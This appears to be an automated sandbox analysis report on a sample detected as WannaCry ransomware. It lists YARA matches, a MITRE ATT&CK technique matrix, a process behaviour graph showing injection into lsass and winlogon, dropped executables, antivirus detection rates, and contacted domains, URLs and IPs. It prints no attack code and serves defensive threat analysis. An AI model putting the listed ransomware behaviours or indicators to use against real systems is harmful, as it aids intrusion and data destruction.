              Source: Yara matchFile source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 684, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 856, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 384, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1312, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium12
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              Data Encrypted for Impact
              Default Accounts1
              Native API              		4
              Windows Service              		4
              Windows Service              		1
              Obfuscated Files or Information              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)312
              Process Injection              		1
              Software Packing              		Security Account Manager123
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts2
              Service Execution              		Logon Script (Mac)Logon Script (Mac)1
              DLL Side-Loading              		NTDS371
              Security Software Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer2
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script121
              Masquerading              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials3
              Process Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items312
              Process Injection              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Rundll32              		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 672008 Sample: y2jb4FtSNq Startdate: 23/07/2022 Architecture: WINDOWS Score: 100 56 xyzrpb.com 2->56 58 xgxizm.com 2->58 60 20 other IPs or domains 2->60 74 Tries to download HTTP data from a sinkholed server 2->74 76 Multi AV Scanner detection for domain / URL 2->76 78 Malicious sample detected (through community Yara rule) 2->78 82 8 other signatures 2->82 11 loaddll32.exe 1 2->11         started        13 svchost.exe 2->13         started        16 mssecsvc.exe 2->16         started        18 9 other processes 2->18 signatures3 80 Tries to resolve many domain names, but no domain seems valid 58->80 process4 dnsIp5 21 cmd.exe 1 11->21         started        23 rundll32.exe 11->23         started        26 rundll32.exe 1 11->26         started        96 Changes security center settings (notifications, updates, antivirus, firewall) 13->96 98 Maps a DLL or memory area into another process 16->98 62 127.0.0.1 unknown unknown 18->62 signatures6 process7 file8 29 rundll32.exe 21->29         started        94 Drops executables to the windows directory (C:\Windows) and starts them 23->94 31 mssecsvc.exe 7 23->31         started        54 C:\Windows\mssecsvc.exe, PE32 26->54 dropped signatures9 process10 dnsIp11 36 mssecsvc.exe 7 29->36         started        68 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.16.173.80, 49740, 80 CLOUDFLARENETUS United States 31->68 52 C:\Windows\tasksche.exe, PE32 31->52 dropped 70 Drops executables to the windows directory (C:\Windows) and starts them 31->70 40 tasksche.exe 31->40         started        file12 72 Tries to resolve many domain names, but no domain seems valid 68->72 signatures13 process14 dnsIp15 64 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 36->64 66 104.17.244.81, 49772, 80 CLOUDFLARENETUS United States 36->66 84 Antivirus detection for dropped file 36->84 86 Multi AV Scanner detection for dropped file 36->86 88 Machine Learning detection for dropped file 36->88 92 5 other signatures 36->92 42 svchost.exe 36->42 injected 44 winlogon.exe 36->44 injected 46 lsass.exe 36->46 injected 48 15 other processes 36->48 90 Detected Wannacry Ransomware 40->90 signatures16 process17 process18 50 backgroundTaskHost.exe 50 21 42->50         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              y2jb4FtSNq.dll85%VirustotalBrowse
              y2jb4FtSNq.dll78%MetadefenderBrowse
              y2jb4FtSNq.dll93%ReversingLabsWin32.Ransomware.WannaCry
              y2jb4FtSNq.dll100%AviraW32/Virut.Gen
              y2jb4FtSNq.dll100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Windows\tasksche.exe100%AviraTR/FileCoder.AU
              C:\Windows\mssecsvc.exe100%AviraW32/Virut.Gen
              C:\Windows\tasksche.exe100%Joe Sandbox ML
              C:\Windows\mssecsvc.exe100%Joe Sandbox ML
              C:\Windows\mssecsvc.exe82%MetadefenderBrowse
              C:\Windows\mssecsvc.exe97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Windows\tasksche.exe85%MetadefenderBrowse
              C:\Windows\tasksche.exe95%ReversingLabsWin32.Ransomware.WannaCry

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File
              12.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              12.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              4.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              4.2.mssecsvc.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
              8.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
              31.2.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              8.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              31.0.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
              8.2.mssecsvc.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
              12.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              12.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
              8.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
              8.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com12%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
              http://crl.ver)0%Avira URL Cloudsafe
              https://%s.xboxlive.com0%URL Reputationsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
              https://dynamic.t0%URL Reputationsafe
              https://www.kryptoslogic.com0%URL Reputationsafe
              http://Passport.NET/tb0%Avira URL Cloudsafe
              http://www.bingmapsportal.comsv0%URL Reputationsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe
              https://%s.dnet.xboxlive.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              		104.16.173.80
              		truetrueunknown
              tvmwem.com
              		unknown
              		unknowntrue
                		unknown
                phirwq.com
                		unknown
                		unknowntrue
                  		unknown
                  liamse.com
                  		unknown
                  		unknowntrue
                    		unknown
                    otoagh.com
                    		unknown
                    		unknowntrue
                      		unknown
                      quydys.com
                      		unknown
                      		unknowntrue
                        		unknown
                        xyzrpb.com
                        		unknown
                        		unknowntrue
                          		unknown
                          dpoead.com
                          		unknown
                          		unknowntrue
                            		unknown
                            tgvyjo.com
                            		unknown
                            		unknowntrue
                              		unknown
                              qavmrl.com
                              		unknown
                              		unknowntrue
                                		unknown
                                xgxizm.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  bauied.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    glutbe.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      boqbzc.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        joddge.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          hmpjac.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            ihepfj.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              abeaay.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                fosajt.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  trptke.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    wfuinm.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      exiuuy.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        tpmtiw.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
                                                          • URL Reputation: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://candycrush.king.com/mobile/windows/TileTemplate.xmlsvchost.exe, 0000000F.00000000.293803098.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.794537669.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282252800.000001BC27C69000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000003.321748674.0000018D75256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.ver)svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000015.00000003.321758168.0000018D75241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322285690.0000018D75242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://%s.xboxlive.comsvchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		low
                                                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000027.00000000.398010629.000002631E56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.commssecsvc.exe.2.drtrue
                                                                                                    • URL Reputation: malware
                                                                                                    		unknown
                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dynamic.tsvchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322257257.0000018D7523A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.kryptoslogic.commssecsvc.exe, 00000008.00000002.351072766.0000000000D50000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.google.comsvchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://Passport.NET/tbsvchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.bingmapsportal.comsvsvchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://activity.windows.comsvchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJmssecsvc.exe, 00000004.00000002.498964463.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://%s.dnet.xboxlive.comsvchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		low
                                                                                                                          https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.16.173.80
                                                                                                                              		www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comUnited States
                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                              104.17.244.81
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              127.0.0.1

                                                                                                                              General Information

